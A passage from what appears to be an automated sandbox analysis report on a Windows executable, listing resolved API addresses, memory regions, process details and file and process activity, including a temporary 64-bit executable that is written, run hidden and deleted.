| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleScreenBufferInfo, address_out = 0x752869c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileType, address_out = 0x75286390 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OutputDebugStringW, address_out = 0x752a1c30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleW, address_out = 0x752868e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteConsoleW, address_out = 0x75286920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFilePointerEx, address_out = 0x75286540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnterCriticalSection, address_out = 0x77ce5e80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LeaveCriticalSection, address_out = 0x77ce5e00 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetStdHandle, address_out = 0x752a26a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapAlloc, address_out = 0x77cdda90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EncodePointer, address_out = 0x77cff190 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DecodePointer, address_out = 0x77cfa200 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitProcess, address_out = 0x752874f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleExW, address_out = 0x75279fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = MultiByteToWideChar, address_out = 0x75272d60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WideCharToMultiByte, address_out = 0x752775a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapFree, address_out = 0x752725e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleMode, address_out = 0x75286870 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleInputA, address_out = 0x752868c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleMode, address_out = 0x75286900 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThread, address_out = 0x75279700 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentThreadId, address_out = 0x75271b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitThread, address_out = 0x77d02570 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryExW, address_out = 0x75277920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteCriticalSection, address_out = 0x77cf9920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushFileBuffers, address_out = 0x752862a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteFile, address_out = 0x75286590 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleCP, address_out = 0x75286860 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x7527a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x75279680 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadFile, address_out = 0x752864a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStartupInfoW, address_out = 0x7527a080 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = UnhandledExceptionFilter, address_out = 0x752a28e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetUnhandledExceptionFilter, address_out = 0x7527a2c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionAndSpinCount, address_out = 0x75286020 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = Sleep, address_out = 0x752777b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateProcess, address_out = 0x7527fbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsAlloc, address_out = 0x75279a70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsGetValue, address_out = 0x75271ba0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsSetValue, address_out = 0x75271da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsFree, address_out = 0x75279930 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidCodePage, address_out = 0x7527a090 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetACP, address_out = 0x75278770 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetOEMCP, address_out = 0x7527fd10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCPInfo, address_out = 0x75279fc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcessHeap, address_out = 0x75277910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = RtlUnwind, address_out = 0x75279a80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = QueryPerformanceCounter, address_out = 0x75272dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessId, address_out = 0x75271d90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemTimeAsFileTime, address_out = 0x75272b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetEnvironmentStringsW, address_out = 0x7527a3b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeEnvironmentStringsW, address_out = 0x7527a0f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapReAlloc, address_out = 0x77cdbae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEndOfFile, address_out = 0x752864f0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetTokenInformation, address_out = 0x76a2ed40 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegDeleteKeyW, address_out = 0x76a2fca0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupPrivilegeValueW, address_out = 0x76a295e0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = AdjustTokenPrivileges, address_out = 0x76a30680 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = OpenProcessToken, address_out = 0x76a2ee90 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegSetValueExW, address_out = 0x76a2f0a0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegQueryValueExW, address_out = 0x76a2ed60 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyExW, address_out = 0x76a2ed80 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyW, address_out = 0x76a2f590 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCreateKeyW, address_out = 0x76a306c0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCloseKey, address_out = 0x76a2efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupAccountSidW, address_out = 0x76a2f7b0 |
|
1 | |
| Get Address | c:\windows\syswow64\comdlg32.dll | function = PrintDlgW, address_out = 0x7516c6a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartPage, address_out = 0x770aee10 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndDoc, address_out = 0x770855a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartDocW, address_out = 0x770857e0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = SetMapMode, address_out = 0x77089590 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = GetDeviceCaps, address_out = 0x77080820 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndPage, address_out = 0x770afbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SendMessageW, address_out = 0x771638f0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = DialogBoxIndirectParamW, address_out = 0x7717b6b0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = EndDialog, address_out = 0x7717b430 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = LoadCursorW, address_out = 0x77167740 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = InflateRect, address_out = 0x771774e0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetSysColorBrush, address_out = 0x7717efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetCursor, address_out = 0x77184ed0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetWindowTextW, address_out = 0x77174580 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetDlgItem, address_out = 0x77171540 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoW, address_out = 0x748e1580 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = VerQueryValueW, address_out = 0x748e1500 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoSizeW, address_out = 0x748e1560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsAlloc, address_out = 0x7527a330 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsFree, address_out = 0x7527f400 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsGetValue, address_out = 0x75277580 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsSetValue, address_out = 0x75279910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionEx, address_out = 0x75286030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventExW, address_out = 0x75285f90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSemaphoreExW, address_out = 0x75285ff0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadStackGuarantee, address_out = 0x7527a5d0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolTimer, address_out = 0x7527a690 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolTimer, address_out = 0x77cd40f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForThreadpoolTimerCallbacks, address_out = 0x77ccd630 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolTimer, address_out = 0x77ccecf0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolWait, address_out = 0x75285720 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolWait, address_out = 0x77cce140 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolWait, address_out = 0x77cceb60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushProcessWriteBuffers, address_out = 0x77d09990 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeLibraryWhenCallbackReturns, address_out = 0x77d05540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessorNumber, address_out = 0x77cf9dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLogicalProcessorInformation, address_out = 0x7527a550 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSymbolicLinkW, address_out = 0x752a0a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetDefaultDllDirectories, address_out = 0x74fa0790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnumSystemLocalesEx, address_out = 0x7527f8a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CompareStringEx, address_out = 0x7527fa30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDateFormatEx, address_out = 0x752a1030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLocaleInfoEx, address_out = 0x7527a000 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTimeFormatEx, address_out = 0x752a14b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetUserDefaultLocaleName, address_out = 0x7527a4f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidLocaleName, address_out = 0x752a16f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringEx, address_out = 0x75279970 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentPackageId, address_out = 0x74f23c90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTickCount64, address_out = 0x75278710 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileInformationByHandleExW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFileInformationByHandleW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsWow64Process, address_out = 0x752796e0 |
|
1 |
System (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2018-11-09 19:48:31 (UTC) |
|
1 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 |
Process #205: g13k6qzj.exe
179
0
| Information | Value |
|---|---|
| ID | #205 |
| File Name | c:\users\ciihmnxmn6ps\desktop\g13k6qzj.exe |
| Command Line | G13k6QZj.exe -accepteula -c Run -y -p extract -nobanner |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:03:19, Reason: Child Process |
| Unmonitor | End Time: 00:03:30, Reason: Self Terminated |
| Monitor Duration | 00:00:11 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xc64 |
| Parent PID | 0x6d4 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
27C
0x
6FC
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00023fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00053fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000060000 | 0x00060000 | 0x0009ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000a0000 | 0x000a0000 | 0x0019ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000001a0000 | 0x001a0000 | 0x001a3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000001b0000 | 0x001b0000 | 0x001b0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x001c1fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001d0000 | 0x001d0000 | 0x0020ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000210000 | 0x00210000 | 0x0026ffff | Private Memory | rw |
|
|
|
- |
| imm32.dll | 0x00210000 | 0x00239fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000210000 | 0x00210000 | 0x00210fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000260000 | 0x00260000 | 0x0026ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000280000 | 0x00280000 | 0x0028ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000290000 | 0x00290000 | 0x0038ffff | Private Memory | rw |
|
|
|
- |
| g13k6qzj.exe | 0x00400000 | 0x00476fff | Memory Mapped File | rwx |
|
|
|
- |
| locale.nls | 0x00480000 | 0x0053dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000540000 | 0x00540000 | 0x0063ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000640000 | 0x00640000 | 0x007c7fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000007d0000 | 0x007d0000 | 0x00950fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000960000 | 0x00960000 | 0x01d5ffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001d60000 | 0x01d60000 | 0x01e2ffff | Private Memory | rw |
|
|
|
- |
| wow64cpu.dll | 0x64ae0000 | 0x64ae7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x64af0000 | 0x64b62fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x64b70000 | 0x64bbefff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x74800000 | 0x74891fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x748e0000 | 0x748e7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74d40000 | 0x74d98fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74da0000 | 0x74da9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74db0000 | 0x74dcdfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74e70000 | 0x74fe5fff | Memory Mapped File | rwx |
|
|
|
- |
| comdlg32.dll | 0x75160000 | 0x7521dfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75260000 | 0x7534ffff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x753b0000 | 0x753f3fff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75400000 | 0x7542afff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x75430000 | 0x767eefff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x76810000 | 0x7681efff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76a10000 | 0x76a8afff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x76c40000 | 0x76c82fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x76d90000 | 0x76e3bfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x76e40000 | 0x76ff9fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x77000000 | 0x7714cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77150000 | 0x7728ffff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x77290000 | 0x772d3fff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x77340000 | 0x773ccfff | Memory Mapped File | rwx |
|
|
|
- |
| windows.storage.dll | 0x773f0000 | 0x778ccfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x778d0000 | 0x779effff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x779f0000 | 0x77aadfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x77c30000 | 0x77c3bfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77ca0000 | 0x77e18fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007feb0000 | 0x7feb0000 | 0x7ffaffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ffd8000 | 0x7ffd8000 | 0x7ffdafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdb000 | 0x7ffdb000 | 0x7ffddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7ff8ee37ffff | Private Memory | r |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ff8ee542000 | 0x7ff8ee542000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (11)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIIHMN~1\AppData\Local\Temp\G13k6QZj64.exe | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Get Info | STD_INPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_ERROR_HANDLE | type = file_type |
|
1 | |
| Get Info | C:\Users\CIIHMN~1\AppData\Local\Temp\G13k6QZj64.exe | type = file_type |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 | |
| Write | C:\Users\CIIHMN~1\AppData\Local\Temp\G13k6QZj64.exe | size = 225280 |
|
1 | |
| Write | C:\Users\CIIHMN~1\AppData\Local\Temp\G13k6QZj64.exe | size = 1168 |
|
1 | |
| Delete | C:\Users\CIIHMN~1\AppData\Local\Temp\G13k6QZj64.exe | - |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIIHMN~1\AppData\Local\Temp\G13k6QZj64.exe | os_pid = 0xc88, show_window = SW_HIDE |
|
1 |
Module (165)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | KERNEL32.DLL | base_address = 0x75260000 |
|
1 | |
| Load | ADVAPI32.dll | base_address = 0x76a10000 |
|
1 | |
| Load | COMDLG32.dll | base_address = 0x75160000 |
|
1 | |
| Load | GDI32.dll | base_address = 0x77000000 |
|
1 | |
| Load | USER32.dll | base_address = 0x77150000 |
|
1 | |
| Load | VERSION.dll | base_address = 0x748e0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75260000 |
|
2 | |
| Get Handle | mscoree.dll | - |
|
1 | |
| Get Filename | - | process_name = c:\users\ciihmnxmn6ps\desktop\g13k6qzj.exe, file_name_orig = C:\Users\CIiHmnxMn6Ps\Desktop\G13k6QZj.exe, size = 260 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEvent, address_out = 0x752860c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForSingleObject, address_out = 0x75286110 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeviceIoControl, address_out = 0x752787e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DuplicateHandle, address_out = 0x75285f30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FormatMessageW, address_out = 0x75284a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventW, address_out = 0x75285fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateProcessW, address_out = 0x7527a510 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExpandEnvironmentStringsW, address_out = 0x7527c8c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDriveTypeW, address_out = 0x75286300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemDirectoryW, address_out = 0x75279a90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteFileW, address_out = 0x752861b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadErrorMode, address_out = 0x7527fae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapSize, address_out = 0x77cf4f40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringW, address_out = 0x75279a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStringTypeW, address_out = 0x752779b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateThread, address_out = 0x7527fcb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OpenProcess, address_out = 0x752792b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetVersion, address_out = 0x7527a300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateFileW, address_out = 0x75286180 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindResourceW, address_out = 0x75283a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SizeofResource, address_out = 0x75278cb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseHandle, address_out = 0x75285f20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetLastError, address_out = 0x75272af0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadResource, address_out = 0x752778f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLastError, address_out = 0x75272db0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcess, address_out = 0x75272da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LockResource, address_out = 0x75277a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCommandLineW, address_out = 0x7527a4b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleW, address_out = 0x75279660 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryW, address_out = 0x7527a0b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStdHandle, address_out = 0x7527a060 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalFree, address_out = 0x752787c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalAlloc, address_out = 0x75278840 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcAddress, address_out = 0x75277940 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleFileNameW, address_out = 0x75279560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleScreenBufferInfo, address_out = 0x752869c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileType, address_out = 0x75286390 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OutputDebugStringW, address_out = 0x752a1c30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleW, address_out = 0x752868e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteConsoleW, address_out = 0x75286920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFilePointerEx, address_out = 0x75286540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnterCriticalSection, address_out = 0x77ce5e80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LeaveCriticalSection, address_out = 0x77ce5e00 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetStdHandle, address_out = 0x752a26a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapAlloc, address_out = 0x77cdda90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EncodePointer, address_out = 0x77cff190 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DecodePointer, address_out = 0x77cfa200 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitProcess, address_out = 0x752874f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleExW, address_out = 0x75279fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = MultiByteToWideChar, address_out = 0x75272d60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WideCharToMultiByte, address_out = 0x752775a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapFree, address_out = 0x752725e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleMode, address_out = 0x75286870 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleInputA, address_out = 0x752868c0 |
|
1 | |
